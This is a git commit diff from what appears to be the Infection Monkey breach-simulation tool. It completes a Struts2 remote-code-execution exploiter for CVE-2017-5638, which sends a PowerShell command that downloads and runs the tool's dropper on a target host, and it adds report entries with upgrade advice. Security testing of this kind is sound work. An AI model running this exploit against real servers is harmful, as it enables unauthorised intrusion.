Finished up exploitation and added reporting

2018-06-20 22:35:18 +03:00 · 2018-06-20 22:35:18 +03:00 · ef6c512ea9
parent 2d27972e7e
commit ef6c512ea9
3 changed files with 41 additions and 6 deletions
--- a/infection_monkey/exploit/struts2.py
+++ b/infection_monkey/exploit/struts2.py
@ -59,8 +59,7 @@ class Struts2Exploiter(HostExploiter):
            if port == 443:
                current_host = "https://%s:%d" % (self.host.ip_addr, port)
            else:
-                # TODO remove struts from url
+                current_host = "http://%s:%d" % (self.host.ip_addr, port)
                current_host = "http://%s:%d/struts" % (self.host.ip_addr, port)
            # Get full URL
            url = self.get_redirected(current_host)
            # Get os architecture so that we don't have to update monkey
@ -154,8 +153,8 @@ class Struts2Exploiter(HostExploiter):
            command = POWERSHELL_HTTP % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path),
                                         'http_path': http_path, 'parameters': cmdline}
-            # TODO Add timeout
+
-            self.exploit(url, command)
+            self.exploit(url, command, RESPONSE_TIMEOUT)
            http_thread.join(DOWNLOAD_TIMEOUT)
            http_thread.stop()
--- a/monkey_island/cc/services/report.py
+++ b/monkey_island/cc/services/report.py
@ -30,6 +30,7 @@ class ReportService:
            'ElasticGroovyExploiter': 'Elastic Groovy Exploiter',
            'Ms08_067_Exploiter': 'Conficker Exploiter',
            'ShellShockExploiter': 'ShellShock Exploiter',
            'Struts2Exploiter': 'Struts2 Exploiter'
        }
    class ISSUES_DICT(Enum):
@ -41,6 +42,7 @@ class ReportService:
        CONFICKER = 5
        AZURE = 6
        STOLEN_SSH_KEYS = 7
        STRUTS2 = 8
    class WARNINGS_DICT(Enum):
        CROSS_SEGMENT = 0
@ -290,6 +292,12 @@ class ReportService:
        processed_exploit['paths'] = ['/' + url.split(':')[2].split('/')[1] for url in urls]
        return processed_exploit
    @staticmethod
    def process_struts2_exploit(exploit):
        processed_exploit = ReportService.process_general_exploit(exploit)
        processed_exploit['type'] = 'struts2'
        return processed_exploit
    @staticmethod
    def process_exploit(exploit):
        exploiter_type = exploit['data']['exploiter']
@ -302,6 +310,7 @@ class ReportService:
            'ElasticGroovyExploiter': ReportService.process_elastic_exploit,
            'Ms08_067_Exploiter': ReportService.process_conficker_exploit,
            'ShellShockExploiter': ReportService.process_shellshock_exploit,
            'Struts2Exploiter': ReportService.process_struts2_exploit
        }
        return EXPLOIT_PROCESS_FUNCTION_DICT[exploiter_type](exploit)
@ -419,6 +428,8 @@ class ReportService:
                    issues_byte_array[ReportService.ISSUES_DICT.AZURE.value] = True
                elif issue['type'] == 'ssh_key':
                    issues_byte_array[ReportService.ISSUES_DICT.STOLEN_SSH_KEYS.value] = True
                elif issue['type'] == 'struts2':
                    issues_byte_array[ReportService.ISSUES_DICT.STRUTS2.value] = True
                elif issue['type'].endswith('_password') and issue['password'] in config_passwords and \
                        issue['username'] in config_users or issue['type'] == 'ssh':
                    issues_byte_array[ReportService.ISSUES_DICT.WEAK_PASSWORD.value] = True
--- a/monkey_island/cc/ui/src/components/pages/ReportPage.js
+++ b/monkey_island/cc/ui/src/components/pages/ReportPage.js
@ -23,7 +23,8 @@ class ReportPageComponent extends AuthComponent {
      SHELLSHOCK: 4,
      CONFICKER: 5,
      AZURE: 6,
-      STOLEN_SSH_KEYS: 7
+      STOLEN_SSH_KEYS: 7,
      STRUTS2: 8
    };
  Warning =
@ -321,7 +322,10 @@ class ReportPageComponent extends AuthComponent {
                    <li>Azure machines expose plaintext passwords. (<a
                      href="https://www.guardicore.com/2018/03/recovering-plaintext-passwords-azure/"
                    >More info</a>)</li> : null}
-
+                  {this.state.report.overview.issues[this.Issue.STRUTS2] ?
                    <li>Struts2 servers are vulnerable to remote code execution. (<a
                      href="https://cwiki.apache.org/confluence/display/WW/S2-045">
                      CVE-2017-5638</a>)</li> : null }
                </ul>
              </div>
              :
@ -671,6 +675,24 @@ class ReportPageComponent extends AuthComponent {
    );
  }
  generateStruts2Issue(issue) {
    return (
      <li>
        Upgrade Struts2 to version 2.3.32 or 2.5.10.1 or any later versions.
        <CollapsibleWellComponent>
          Struts2 server at <span className="label label-primary">{issue.machine}</span> (<span
          className="label label-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to <span
          className="label label-danger">remote code execution</span> attack.
          <br/>
          The attack was made possible because the server is using an old version of Jakarta based file upload
          Multipart parser. For possible work-arounds and more info read <a
                      href="https://cwiki.apache.org/confluence/display/WW/S2-045"
                    >here</a>.
        </CollapsibleWellComponent>
      </li>
    );
  }
  generateIssue = (issue) => {
@ -718,6 +740,9 @@ class ReportPageComponent extends AuthComponent {
      case 'azure_password':
        data = this.generateAzureIssue(issue);
        break;
      case 'struts2':
        data = this.generateStruts2Issue(issue);
        break;
    }
    return data;
  };